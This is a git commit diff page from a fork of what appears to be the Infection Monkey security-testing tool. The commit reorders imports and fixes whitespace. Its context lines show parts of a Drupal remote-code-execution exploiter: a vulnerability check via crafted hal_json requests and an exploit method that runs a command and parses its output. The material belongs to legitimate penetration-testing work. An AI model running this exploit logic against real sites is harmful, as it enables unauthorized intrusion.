p15693087
/
monkey
forked from p15670423/monkey
1
0
Fork 0
Code Issues Pull Requests 1 Projects Releases Wiki Activity

Update minor things in order to pass CI build

This commit is contained in:
Shay Nehmad 2020-09-01 11:48:06 +03:00
parent e7ecaa1744
commit cec57c1604
2 changed files with 15 additions and 12 deletions
Show Stats Download Patch File Download Diff File Expand all files Collapse all files

3
monkey/common/network/test_network_utils.py
View File

@ -1,6 +1,7 @@
from unittest import TestCase from unittest import TestCase
from common.network.network_utils import get_host_from_network_location, remove_port from common.network.network_utils import (get_host_from_network_location,
remove_port)
class TestNetworkUtils(TestCase): class TestNetworkUtils(TestCase):

24
monkey/infection_monkey/exploit/drupal.py
View File

@ -5,11 +5,13 @@ Implementation is based on:
""" """
import logging import logging
import requests
from urllib.parse import urljoin from urllib.parse import urljoin
import requests
from common.network.network_utils import remove_port
from infection_monkey.exploit.web_rce import WebRCE from infection_monkey.exploit.web_rce import WebRCE
from infection_monkey.model import ID_STRING from infection_monkey.model import ID_STRING
from network.network_utils import remove_port
__author__ = 'Ophir Harpaz' __author__ = 'Ophir Harpaz'
@ -102,15 +104,15 @@ class DrupalExploiter(WebRCE):
"value": "" "value": ""
} }
} }
response = requests.get(f'{url}?_format=hal_json', response = requests.get(f'{url}?_format=hal_json',
json=payload, json=payload,
headers={"Content-Type": "application/hal+json"}) headers={"Content-Type": "application/hal+json"})
if check_drupal_cache(response): if check_drupal_cache(response):
LOG.info(f'Checking if node {url} is vuln returned cache HIT, ignoring') LOG.info(f'Checking if node {url} is vuln returned cache HIT, ignoring')
return False return False
return 'INVALID_VALUE does not correspond to an entity on this site' in response.text return 'INVALID_VALUE does not correspond to an entity on this site' in response.text
def exploit(self, url, command): def exploit(self, url, command):
@ -138,21 +140,21 @@ class DrupalExploiter(WebRCE):
} }
} }
} }
LOG.info(payload) LOG.info(payload)
r = requests.get(f'{url}?_format=hal_json', json=payload, headers={"Content-Type": "application/hal+json"}) r = requests.get(f'{url}?_format=hal_json', json=payload, headers={"Content-Type": "application/hal+json"})
if check_drupal_cache(r): if check_drupal_cache(r):
LOG.info(f'Exploiting {url} returned cache HIT, may have failed') LOG.info(f'Exploiting {url} returned cache HIT, may have failed')
if ID_STRING not in r.text: if ID_STRING not in r.text:
LOG.warning('Command execution _may_ have failed') LOG.warning('Command execution _may_ have failed')
result = r.text.split(ID_STRING)[-1] result = r.text.split(ID_STRING)[-1]
LOG.info(f'Drupal exploit result = {result}') LOG.info(f'Drupal exploit result = {result}')
return result return result
def get_target_url(self): def get_target_url(self):
""" """
We're overriding this method such that every time self.exploit is invoked, we use a fresh vulnerable URL. We're overriding this method such that every time self.exploit is invoked, we use a fresh vulnerable URL.